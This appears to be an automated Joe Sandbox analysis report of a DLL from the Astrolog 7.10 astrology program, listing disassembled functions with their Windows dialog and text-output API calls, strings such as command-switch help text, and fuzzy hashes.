String ID: Switches for relationship and comparison charts:$Switches to access graphics options:$Switches which affect how a chart is computed:$Switches which affect how the chart parameters are obtained:$Switches which affect what information is used in a chart:$Switches which determine the type of chart to display:$ brightness, distance, or zodiac position velocity.$ 0 = Placidus, 1 = Koch, 2 = Equal, 3 = Campanus, 4 = Meridian,$ 12 = Pullen Sinusoidal Ratio, 13 = Pullen Sinusoidal Delta,$ 14 = Whole, 15 = Vedic, 16 = Sripati, 17 = Horizon, 18 = APC,$ 19 = Carter Poli Equatorial, 20 = Sunshine, 21 = Null.$ 2nd planet, aspect, 1st position, 2nd position, midpoint.$ 5 = Regiomontanus, 6 = Porphyry, 7 = Morinus, 8 = Topocentric,$ 9 = Alcabitius, 10 = Krusinski, 11 = Equal (Midheaven),$ Compute chart automatically given specified data.$ Like _qa but takes additional parameter for Daylight offset.$ _+ [<days>]: Cast chart for specified num of days in the future.$ _+[m,y] [<value>]: Cast chart for num of months/years in future.$ _- [<days>]: Cast chart for specified num of days in the past.$ _1 [<objnum>]: Cast chart with specified object on Ascendant.$ _2 [<objnum>]: Cast chart with specified object on Midheaven.$ _3: Display objects in their zodiac decan positions.$ _4 [<nest>]: Display objects in their (nested) dwad positions.$ _7: Display Esoteric Astrology and Ray summary for chart.$ _9: Display objects in their zodiac navamsa positions.$ _A <0-18>: Specify the number of aspects to use in charts.$ _A3: Aspects calculated by latitude combined with zodiac position.$ _AP: Parallel aspects based on ecliptic not equatorial positions.$ _Aa <aspect> <angle>: Change the actual angle of an aspect.$ _Ad <planet> <orb>: Specify orb addition given to a planet.$ _Am <planet> <orb>: Specify maximum orb allowed to a planet.$ _Ao <aspect> <orb>: Specify maximum orb for an aspect.$ _Ap: Orb limits apply to latitude as well as zodiac position.$ _B0: Like _B but don't restrict fast moving objects from graph.$ _B: Like _d but graph all aspects occurring in a day.$ _B[m,y,Y]: Like _B but for entire month, year, or five years.$ _C: Include angular and non-angular house cusps in charts.$ _D: Like _d but display aspects by influence instead of time.$ _E: Display planetary ephemeris for given month.$ _EY <years>: Display planetary ephemeris for a number of years.$ _E[]0 <step>: Display ephemeris times for days, months, or years.$ _Ey: Display planetary ephemeris for the entire year.$ _F <objnum> <sign> <deg>: Force object's position to be value.$ _Fm <objnum> <obj1> <obj2>: Force object's position to midpoint.$ _G: Compute houses based on geographic location only.$ _H7: Display information about the seven esoteric Rays.$ _H: Display this help list.$ _HA: Display available aspects, their angles, and present orbs.$ _HC: Display names of zodiac signs and houses.$ _HF: Display names of astronomical constellations.$ _HI: Display meanings of signs, houses, planets, and aspects.$ _HO: Display available planets and other celestial objects.$ _HS: Display information about planets in the solar system.$ _Hc: Display program credits and copyrights.$ _He: Display all tables together (_Hc_H_Y_HX_HC_HO_HA%s_HS_H7%s).$ _I [<columns>]: Print interpretation of selected charts.$ _J: Display wheel charts in Vedic format.$ _K: Display a calendar for given month.$ _Ky: Like _K but display a calendar for the entire year.$ _L [<step>]: Display astro-graph locations of planetary angles.$ _L0 [..]: Like _L but display list of latitude crossings too.$ _M <1-48>: Run the specified command switch macro.$ _M0 <1-48> <string>: Define the specified command switch macro.$ _M[2-4][0] <strings>: Define macro(s) to run when chart calculated.$ _N [<rows>]: Lookup chart location as city in atlas.$ _Nl [<rows>]: Display nearest cities in atlas to chart location.$ _Nz [<rows>]: Display all time changes in time zone of chart city.$ _P [<parts>]: Display list of Arabic parts and their positions.$ _P0 [<parts>]: Like _P but display formulas with terms reversed.$ _P[z,n,f]: Order parts by position, name, or formula.$ _Q0: Like _Q but prompt for additional switches on startup.$ _Q: Prompt for more command switches after display finished.$ _R [<obj1> [<obj2> ..]]: Restrict specific bodies from displays.$ _R0 [<obj1> ..]: Like _R but restrict everything first.$ _R1 [<obj1> ..]: Like _R0 but unrestrict and show all objects.$ _RA [<asp1> ..]: Restrict specific aspects from displays.$ _RO <obj>: Require object to be present in aspects.$ _RT[0,1,C,u,U] [..]: Restrict transiting planets in _t lists.$ _R[C,u,U]: Restrict all minor cusps, all Uranians, or stars.$ _S: Display x,y,z coordinate positions of planets in space.$ _T <month> <day> <year>: Display transits ordered by influence.$ _T[p]n: Display transits ordered by influence for current date.$ _T[t]p <month> <day> <year>: Print progressions instead of transits.$ _Tt <month> <day> <year> <time>: Like _T but specify time too.$ _U: Include locations of fixed background stars in charts.$ _U[z,l,n,b,d,v]: Sort stars by zodiac position, latitude, name,$ _V [..]: Like _t but graph all transits occurring during period.$ _V[..]0: Like _V but don't restrict fast moving objects from graph.$ _V[d,y,Y] [[<day>] <month>] <year>: Like _V for day, year, or 5 years.$ _Y: Display help list of less commonly used command switches.$ _Z0: Like _Z but express coordinates relative to polar center.$ _Z: Display planet locations with respect to the local horizon.$ _Zd: Search day for object local rising and setting times.$ _Zd[m,y,Y] [<years>]: Like _Zd but for entire month, year, or years.$ _a0: Like _a but display aspect summary too.$ _a: Display list of all aspects ordered by influence.$ _a[jonOPACDm]: Sort aspects by power, orb, orb difference, 1st planet,$ _aa: Like _a but indicate applying/separating instead of offset orbs.$ _ap: Like _a but do parallel and contraparallel aspects.$ _b0: Display locations and times to the nearest second.$ _b: Use ephemeris files for more accurate location computations.$ _bU: Use inaccurate Matrix formulas for fixed stars only.$ _bm: Use inaccurate Matrix formulas when ephemeris unavailable.$ _bp: Use less accurate Placalc ephemeris instead of Swiss Ephemeris.$ _bs: Use less accurate Moshier formulas instead of Swiss Ephemeris.$ _c <value>: Select a different system of house division.$ _c3: Place in houses using latitude as well as zodiac position.$ _d [<step>]: Print all aspects and changes occurring in a day.$ _dY <years>: Like _d but search within a number of years.$ _dm: Like _d but print all aspects for the entire month.$ _dp <month> <year>: Print aspects within progressed chart.$ _dpY <year> <years>: Like _dp but search within number of years.$ _dp[y]n: Search for progressed aspects in current month/year.$ _dpy <year>: Like _dp but search for aspects within entire year.$ _dy: Like _d but print all aspects for the entire year.$ _e: Print all charts together (_v_w_g_a_m_Z_S_l_j_7_L_K_Zd_d_D_B_E).$ _f: Display houses as sign positions (flip them).$ _g0: Like _g but flag aspect configurations (e.g. Yods) too.$ _g: Display aspect and midpoint grid among planets.$ _ga: Like _g but indicate applying/separating instead of offset orbs.$ _gm: For comparison charts, show midpoints instead of aspects.$ _gp: Like _g but generate parallel and contraparallel aspects.$ _h [<objnum>]: Compute positions centered on specified object.$ _i <file>: Compute chart based on info in file.$ _i[2,3,4] <file>: Load chart info into chart slots 2, 3, or 4.$ _j0: Like _j but include influences of each zodiac sign as well.$ _j: Display astrological influences of each object in chart.$ _k0: Like _k but only use special characters, not Ansi color.$ _k: Display text charts using Ansi characters and color.$ _kh: Text charts saved to file use HTML instead of Ansi codes.$ _l0: Like _l but approximate sectors using Placidus cusps.$ _l: Display Gauquelin sectors for each planet in chart.$ _m0: Like _m but display midpoint summary too.$ _m: Display all object midpoints in sorted zodiac order.$ _ma: Like _m but show aspects from midpoints to planets as well.$ _n: Compute chart for this exact moment using current time.$ _n[d,m,y]: Compute chart for start of current day, month, year.$ _o <file> [..]: Write parameters of current chart to file.$ _o0 <file> [..]: Like _o but output planet/house positions.$ _od <file>: Output program's current settings to switch file.$ _os <file>, > <file>: Redirect output of text charts to file.$ _p <month> <day> <year>: Cast secondary progressed chart for date.$ _p0 <month> <day> <year>: Cast solar arc chart for date.$ _p1 <month> <day> <year>: Like _p but with solar arc cusps only.$ _pC <days>: Set factor to use when progressing cusps (default 1.0).$ _p[0]n: Cast progressed chart based on current date now.$ _p[0]t <month> <day> <year> <time>: Like _p but specify time too.$ _pd <days>: Set num of days to progress / day (default 365.24219).$ _q <month> <date> <year> <time>: Compute chart with defaults.$ _qa <month> <date> <year> <time> <zone> <long> <lat>:$ _qb <month> <date> <year> <time> <daylight> <zone> <long> <lat>:$ _qd <month> <date> <year>: Compute chart for noon on date.$ _qj <day>: Compute chart for time of specified Julian day.$ _qm <month> <year>: Compute chart for first of month.$ _qy <year>: Compute chart for first day of year.$ _r <file1> <file2>: Compute a relationship synastry chart.$ _r0 <file1> <file2>: Keep the charts separate in comparison.$ _r[3,4]: Make graphics wheel chart tri-wheel or quad-wheel.$ _r[c,m]0 <file1> <file2> <ratio1> <ratio2>: Weighted chart.$ _rb <file1> <file2>: Display biorhythm for file1 at time file2.$ _rc <file1> <file2>: Compute a composite chart.$ _rd <file1> <file2>: Print time span between files' dates.$ _rm <file1> <file2>: Compute a time space midpoint chart.$ _rp[0] <file1> <file2>: Like _r0 but do file1 progr. to file2.$ _rt <file1> <file2>: Like _r0 but treat file2 as transiting.$ _s [..]: Compute a sidereal instead of standard tropical chart.$ _s[z,h,d]: Display locations as in zodiac, hours/minutes, or degrees.$ _sr0: Like _sr but only display declinations instead of latitudes.$ _sr: Compute right ascension locations relative to equator.$ _t <month> <year>: Compute all transits to natal planets in month.$ _t[p]Y: <year> <years>: Compute transits for a number of years.$ _t[p]d: <month> <day> <year>: Compute transits for a single day.$ _t[p]y: <year>: Compute transits/progressions for entire year.$ _t[py]n: Compute transits to natal planets for current time now.$ _tp <month> <year>: Compute progressions to natal in month for chart.$ _tr <month> <year>: Compute all returns in month for chart.$ _u: Include transneptunian/Uranian bodies in charts.$ _v0: Like _v but express velocities relative to average speed.$ _v: Display list of object positions (chosen by default).$ _w [<rows>]: Display chart in a graphic house wheel format.$ _w0 [..]: Like _w but reverse order of objects in houses 4..9.$ _x <value>: Cast harmonic chart based on specified factor.$ _y <file>: Display current house transits for particular chart.$ _y[b,d,p,t] <file>: Like _r0 but compare to current time now.$ _z [<zone>]: Change the default time zone (for _d_E_t_q options).$ _z0 [<offset>]: Change the default Daylight time setting.$ _zN <city>: Lookup city in atlas and set zone, Daylight, and location.$ _zd <date>: Set only the day of current chart.$ _zi <name> <place>: Set name and place strings of current chart.$ _zj <name> <place>: Change the default name and place strings.$ _zl <long> <lat>: Change the default longitude & latitude.$ _zm <month>: Set only the month of current chart.$ _zt <time>: Set only the time of current chart.$ _zv <elev>: Change the default elevation above sea level.$ _zy <year>: Set only the year of current chart.$%s (version %s) command switches:$7.10$Astrolog$_HF$_HI
API String ID: 1830584065-1115848666
Opcode ID: b5757d01faaef55038c8728ecd08a6a2540195a08b2158442662492c01409669
Instruction ID: 8374b951d02b404e932245c627ac9937798c2c4ce2ddf8575e472ad8a55cbbf8
Opcode Fuzzy Hash: b5757d01faaef55038c8728ecd08a6a2540195a08b2158442662492c01409669
Instruction Fuzzy Hash: 7BD1EBB8F5D15DCAE506F7FDA4CAEECF5520BAA15C7900430A0E59EF40DB0CD9294AA3

Function 6C3ABFFC Relevance: 93.2, APIs: 49, Strings: 4, Instructions: 423COMMON

Download Yara Rule

APIs

GetDlgItemTextA.USER32(?,00000474,?,000000FF), ref: 6C3AC053
GetDlgItemInt.USER32(?,00000475,00000000,00000001), ref: 6C3AC071
GetDlgItemTextA.USER32(?,00000476,?,000000FF), ref: 6C3AC087
IsDlgButtonChecked.USER32(?,00000533), ref: 6C3AC0E5
IsDlgButtonChecked.USER32(?,0000052F), ref: 6C3AC0F2
IsDlgButtonChecked.USER32(?,00000536), ref: 6C3AC0FF
IsDlgButtonChecked.USER32(?,00000538), ref: 6C3AC10C
IsDlgButtonChecked.USER32(?,0000052E), ref: 6C3AC119
IsDlgButtonChecked.USER32(?,0000052D), ref: 6C3AC126
IsDlgButtonChecked.USER32(?,00000535), ref: 6C3AC133
IsDlgButtonChecked.USER32(?,00000534), ref: 6C3AC140
IsDlgButtonChecked.USER32(?,00000532), ref: 6C3AC156
IsDlgButtonChecked.USER32(?,00000527), ref: 6C3AC163
IsDlgButtonChecked.USER32(?,00000531), ref: 6C3AC170
IsDlgButtonChecked.USER32(?,00000539), ref: 6C3AC17D
GetDlgItemTextA.USER32(?,00000477,?,000000FF), ref: 6C3AC19B
GetDlgItemTextA.USER32(?,00000478,?,000000FF), ref: 6C3AC1C1
IsDlgButtonChecked.USER32(?,000004B9), ref: 6C3AC1DD
IsDlgButtonChecked.USER32(?,000004B7), ref: 6C3AC1F2
IsDlgButtonChecked.USER32(?,000004BA), ref: 6C3AC207
IsDlgButtonChecked.USER32(?,000004BB), ref: 6C3AC21C
IsDlgButtonChecked.USER32(?,6C46DECC), ref: 6C3AC251
_memset.LIBCMT ref: 6C3AC27D
_memset.LIBCMT ref: 6C3AC29C
IsDlgButtonChecked.USER32(?,00000537), ref: 6C3AC2B9
IsDlgButtonChecked.USER32(?,6C47A9B4), ref: 6C3AC2E7
EndDialog.USER32(?,00000001), ref: 6C3AC303
CheckDlgButton.USER32(?,00000533), ref: 6C3AC347
CheckDlgButton.USER32(?,0000052F), ref: 6C3AC355
CheckDlgButton.USER32(?,00000536), ref: 6C3AC363
CheckDlgButton.USER32(?,00000538), ref: 6C3AC371
CheckDlgButton.USER32(?,0000052E), ref: 6C3AC37F
CheckDlgButton.USER32(?,0000052D), ref: 6C3AC38D
CheckDlgButton.USER32(?,00000535), ref: 6C3AC39B
CheckDlgButton.USER32(?,00000534), ref: 6C3AC3A9
SetDlgItemTextA.USER32(?,00000476,None), ref: 6C3AC3CE
CheckDlgButton.USER32(?,00000532), ref: 6C3AC3DC
CheckDlgButton.USER32(?,00000527), ref: 6C3AC3EA
CheckDlgButton.USER32(?,00000531), ref: 6C3AC3F8
CheckDlgButton.USER32(?,00000539,00000000), ref: 6C3AC40C
SetDlgItemTextA.USER32(?,00000477,00000000), ref: 6C3AC427
SetDlgItemTextA.USER32(?,00000478,00000000), ref: 6C3AC442
CheckRadioButton.USER32(?,000004B7,000004B9,00000000), ref: 6C3AC46E
CheckRadioButton.USER32(?,000004BA,000004BC,000004BB), ref: 6C3AC498
CheckDlgButton.USER32(?,00000528,00010100), ref: 6C3AC4C0
SetDlgItemInt.USER32(?,00000474,00000001), ref: 6C3AC4DD
SetDlgItemInt.USER32(?,00000475,00000001), ref: 6C3AC4ED
CheckDlgButton.USER32(?,00000537), ref: 6C3AC4FB
CheckDlgButton.USER32(?,0000053A,00000000), ref: 6C3AC523

Strings

required object, xrefs: 6C3AC0C7
None, xrefs: 6C3AC3C3
aspect count, xrefs: 6C3AC319
text columns, xrefs: 6C3AC30E

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: Button$Checked$Check$Item$Text$Radio_memset$Dialog
String ID: None$aspect count$required object$text columns
API String ID: 3830697383-2213102871
Opcode ID: a86f981029c5075e8ef48356a3231ad3c018b2ba078dbddb4465b086ec48977d
Instruction ID: a181a4736b8f707bceecfc95807cd1c1796c7f2eea26e69d18c5df507ac67bce
Opcode Fuzzy Hash: a86f981029c5075e8ef48356a3231ad3c018b2ba078dbddb4465b086ec48977d
Instruction Fuzzy Hash: AAD1D271A44305AFEB00EF61DC85E7B7BF8EB9AB05F10442EF24096180DBB58615DFA2

Function 6C3ACF73 Relevance: 93.1, APIs: 49, Strings: 4, Instructions: 365windowCOMMON

Download Yara Rule

APIs

GetDlgItemInt.USER32(?,0000046F,?,00000001), ref: 6C3ACFAB
GetDlgItemInt.USER32(?,0000046C,00000000,00000001), ref: 6C3ACFB9
GetDlgItemInt.USER32(?,0000046D,00000000,00000001), ref: 6C3ACFC8
GetDlgItemInt.USER32(?,00000470,00000000,00000001), ref: 6C3ACFD7
IsDlgButtonChecked.USER32(?,00000523), ref: 6C3AD021
CheckMenuItem.USER32(00009C8F,-00000008), ref: 6C3AD046
IsDlgButtonChecked.USER32(?,00000524), ref: 6C3AD062
IsDlgButtonChecked.USER32(?,0000051A), ref: 6C3AD06F
IsDlgButtonChecked.USER32(?,0000051B), ref: 6C3AD07C
IsDlgButtonChecked.USER32(?,00000518), ref: 6C3AD089
IsDlgButtonChecked.USER32(?,00000520), ref: 6C3AD096
IsDlgButtonChecked.USER32(?,00000521), ref: 6C3AD0A3
IsDlgButtonChecked.USER32(?,00000525), ref: 6C3AD0B0
IsDlgButtonChecked.USER32(?,0000051E), ref: 6C3AD0BD
IsDlgButtonChecked.USER32(?,0000051D), ref: 6C3AD0CA
IsDlgButtonChecked.USER32(?,0000051C), ref: 6C3AD0D7
IsDlgButtonChecked.USER32(?,0000051F), ref: 6C3AD0EC
IsDlgButtonChecked.USER32(?,00000519), ref: 6C3AD0F9
IsDlgButtonChecked.USER32(?,00000522), ref: 6C3AD10E
IsDlgButtonChecked.USER32(?,000004B8), ref: 6C3AD133
IsDlgButtonChecked.USER32(?,000004B9), ref: 6C3AD147
IsDlgButtonChecked.USER32(?,000004BA), ref: 6C3AD15F
IsDlgButtonChecked.USER32(?,000004BF), ref: 6C3AD1C5
IsDlgButtonChecked.USER32(?,000004C0), ref: 6C3AD1D9
IsDlgButtonChecked.USER32(?,000004C1), ref: 6C3AD1F1
EndDialog.USER32(?,00000001), ref: 6C3AD20D
CheckDlgButton.USER32(?,00000523), ref: 6C3AD264
SetDlgItemInt.USER32(?,0000046F,00000001), ref: 6C3AD27A
CheckDlgButton.USER32(?,00000524), ref: 6C3AD288
CheckDlgButton.USER32(?,0000051A), ref: 6C3AD296
CheckDlgButton.USER32(?,0000051B), ref: 6C3AD2A4
CheckDlgButton.USER32(?,00000518), ref: 6C3AD2B2
CheckDlgButton.USER32(?,00000520), ref: 6C3AD2C0
CheckDlgButton.USER32(?,00000521), ref: 6C3AD2CE
CheckDlgButton.USER32(?,00000525), ref: 6C3AD2DC
CheckDlgButton.USER32(?,0000051E), ref: 6C3AD2EA
CheckDlgButton.USER32(?,0000051D), ref: 6C3AD2F8
CheckDlgButton.USER32(?,0000051C), ref: 6C3AD306
SetDlgItemInt.USER32(?,0000046C,00000001), ref: 6C3AD316
CheckDlgButton.USER32(?,0000051F), ref: 6C3AD324
CheckDlgButton.USER32(?,00000519,00000000), ref: 6C3AD338
SetDlgItemInt.USER32(?,0000046D,00000001), ref: 6C3AD348
CheckDlgButton.USER32(?,00000522), ref: 6C3AD356
SetDlgItemInt.USER32(?,00000470,00000001), ref: 6C3AD366
CheckRadioButton.USER32(?,000004B7,000004BD,000004BB), ref: 6C3AD3C4
CheckRadioButton.USER32(?,000004BE,000004C1,000004C1), ref: 6C3AD3F7

Strings

wheel row, xrefs: 6C3AD239
Arabic part, xrefs: 6C3AD22A
astro-graph step, xrefs: 6C3AD232
Biorhythm days, xrefs: 6C3AD218

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: Button$Checked$Check$Item$Radio$DialogMenu
String ID: Arabic part$Biorhythm days$astro-graph step$wheel row
API String ID: 2643506611-3563571515
Opcode ID: a79fd2358d277d15651eca5c43bc72931a5922b7f8c7873dcf715f91b17a66bd
Instruction ID: 66f0a1100f8c386417e35e5a743ae1f821e74bfdd79bf5184911b645acf0a7bd
Opcode Fuzzy Hash: a79fd2358d277d15651eca5c43bc72931a5922b7f8c7873dcf715f91b17a66bd
Instruction Fuzzy Hash: 50B1C870B41704AAEB00EF768C45F7B3EB9EB57B44F20401AFA149A5D4D7B98412CF61

Function 6C363EF3 Relevance: 79.2, APIs: 22, Strings: 23, Instructions: 450COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6C363F60
_sprintf.LIBCMT ref: 6C363FDA
_sprintf.LIBCMT ref: 6C36406B
__floor_pentium4.LIBCMT ref: 6C36409A
_sprintf.LIBCMT ref: 6C3640B1
_sprintf.LIBCMT ref: 6C3640E5

Part of subcall function 6C371AD3: SetTextColor.GDI32(00000000), ref: 6C371B19

_sprintf.LIBCMT ref: 6C364120

Part of subcall function 6C3714FC: TextOutA.GDI32(-00000005,00000017,?,00000001,00000001), ref: 6C3715C4
Part of subcall function 6C3714FC: EndPage.GDI32(00000000), ref: 6C371684
Part of subcall function 6C3714FC: StartPage.GDI32 ref: 6C371690
Part of subcall function 6C3714FC: SetMapMode.GDI32(00000008), ref: 6C37169E
Part of subcall function 6C3714FC: SetViewportOrgEx.GDI32(00000000,00000000,00000000), ref: 6C3716AD
Part of subcall function 6C3714FC: GetDeviceCaps.GDI32(0000000A,00000000), ref: 6C3716BC
Part of subcall function 6C3714FC: GetDeviceCaps.GDI32(00000008,00000000), ref: 6C3716C7
Part of subcall function 6C3714FC: SetViewportExtEx.GDI32(00000000,?,00000000), ref: 6C3716D0
Part of subcall function 6C3714FC: SetWindowOrgEx.GDI32(00000000,00000000,00000000), ref: 6C3716DF

_sprintf.LIBCMT ref: 6C364161
_sprintf.LIBCMT ref: 6C364216
_sprintf.LIBCMT ref: 6C364245
__floor_pentium4.LIBCMT ref: 6C364286
_sprintf.LIBCMT ref: 6C36429D
_sprintf.LIBCMT ref: 6C3642C8
__floor_pentium4.LIBCMT ref: 6C364309
_sprintf.LIBCMT ref: 6C364320
_sprintf.LIBCMT ref: 6C36437E
_sprintf.LIBCMT ref: 6C3643C7
_sprintf.LIBCMT ref: 6C364417
_sprintf.LIBCMT ref: 6C364457

Part of subcall function 6C3D1F84: __output_l.LIBCMT ref: 6C3D1FDF

_sprintf.LIBCMT ref: 6C3644AF
_sprintf.LIBCMT ref: 6C3644EF
_memmove.LIBCMT ref: 6C364521

Strings

%2d, xrefs: 6C364065, 6C36423B, 6C364243, 6C3642C6
Planets in plus zones: %d/%d = %.2f%%, xrefs: 6C3643C1
%7.4f, xrefs: 6C3641F6
Num :, xrefs: 6C364435, 6C3644CD
Sec, xrefs: 6C36404C
%7.5f, xrefs: 6C3641EF
Plus House Sign Ret. Latit. Veloc. 18 12, xrefs: 6C363F8F
%c , xrefs: 6C36415B
%5.2f, xrefs: 6C364207
H;Gl, xrefs: 6C363FA3
Body Sector , xrefs: 6C363F78
[%2d%s house] , xrefs: 6C36411A
H?Gl, xrefs: 6C363F52
%c, xrefs: 6C3640DF
Plus zones: %d/%d = %.2f%% - , xrefs: 6C364378
Plus House Sign Loc. Ret. Latitude Velocity Sec.18 Sec.12, xrefs: 6C363F82
%5.3f, xrefs: 6C364200, 6C364211
%.3f, xrefs: 6C3640AB, 6C364297, 6C36431A
%2d%c, xrefs: 6C3643E4, 6C364415, 6C3644AD
. , xrefs: 6C364464, 6C3644FC
%-4.4s: , xrefs: 6C363FD4
Zone:, xrefs: 6C3643D7, 6C364474
%2d , xrefs: 6C364451, 6C3644E9

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf$__floor_pentium4$CapsDevicePageTextViewport_memmove$ColorModeStartWindow__output_l
String ID: Num :$Plus zones: %d/%d = %.2f%% - $Zone:$ . $ Plus House Sign Loc. Ret. Latitude Velocity Sec.18 Sec.12$ %2d$ %2d $ %2d%c$ %c$ %c $ [%2d%s house] $%-4.4s: $%.3f$%5.2f$%5.3f$%7.4f$%7.5f$Body Sector $H;Gl$H?Gl$Planets in plus zones: %d/%d = %.2f%%$Plus House Sign Ret. Latit. Veloc. 18 12$Sec
API String ID: 3234483138-1638245833
Opcode ID: 00983a753b16ae1ded3a3049c4898d07dd4d3298bfe9cbf12153c11891380ac6
Instruction ID: 2ed925e324fc0eec55dce3ab3b2d8b245b78c8c44b8ac14ae9db51b0e244120b
Opcode Fuzzy Hash: 00983a753b16ae1ded3a3049c4898d07dd4d3298bfe9cbf12153c11891380ac6
Instruction Fuzzy Hash: 24F104B3D101889BCB20EBA2DC51FEDB778EF05308F040965D48AA6A84DF75D958CF66

Function 6C374C0A Relevance: 75.7, APIs: 22, Strings: 21, Instructions: 480COMMON

Download Yara Rule

Strings

File '%s' can not be created., xrefs: 6C374C64
@AP%s ; %s chart positions., xrefs: 6C375004
%3d %.3s %12.9f,, xrefs: 6C3750C5
%4d %13.9f,, xrefs: 6C375124
H_%c: %2d %2d %10.7f, xrefs: 6C374FDA
%cqb %.3s %d %d %s %s , xrefs: 6C374DEC
Can't output chart with no time/space to file., xrefs: 6C374C9A
%13.9f %13.9f, xrefs: 6C375194
%cYF , xrefs: 6C375044
[%c]: %3d %12.8f, xrefs: 6C374F4A
%d%d%d%.2f%.2f%.2f%.2f, xrefs: 6C374D2D
%s %s, xrefs: 6C374E2B
710, xrefs: 6C374D45, 6C374FFF
%czi "%s" "%s", xrefs: 6C374E71, 6C37501D
%-4d, xrefs: 6C375066
Autodetect, xrefs: 6C374DA9
%.3s: %2d %2d %10.7f, xrefs: 6C374ED5
Astrolog, xrefs: 6C374D40, 6C374FFA
@AI%s ; %s chart info., xrefs: 6C374D4A
%s%s, xrefs: 6C3751DC
%-4.4s, xrefs: 6C37505E

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
